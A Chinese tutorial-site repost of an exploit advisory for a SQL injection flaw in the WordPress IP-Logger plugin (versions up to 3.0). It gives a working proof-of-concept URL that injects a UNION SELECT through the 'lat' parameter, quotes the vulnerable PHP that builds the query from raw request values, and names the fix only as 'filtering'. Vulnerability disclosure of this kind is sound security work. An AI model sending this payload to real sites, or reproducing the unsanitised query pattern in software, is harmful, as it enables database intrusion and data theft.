网站地图    收藏   

主页 > 后端 > 网站安全 >

WordPress插件IP-Logger<= 3.0 SQL注射缺陷及修复 - 网

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] # Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)# 下载地址: http://downloads.wordpr......

 
# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# 下载地址: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# 测试版本: 3.0 (已测)
 
---
测试方法
---
http://www.2cto.com /wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1
 
---------------
缺陷代码
---------------
$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,Blocked,Ignored from $table_name
  where Latitude=%s and Longitude=%s and Blocked = '%s'
  order by stamp asc limit 50",
  $_REQUEST["lat"],
  $_REQUEST["lon"],
  $_REQUEST["blocked"]);
 
$res = mysql_query($sql);
 
修复:
过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论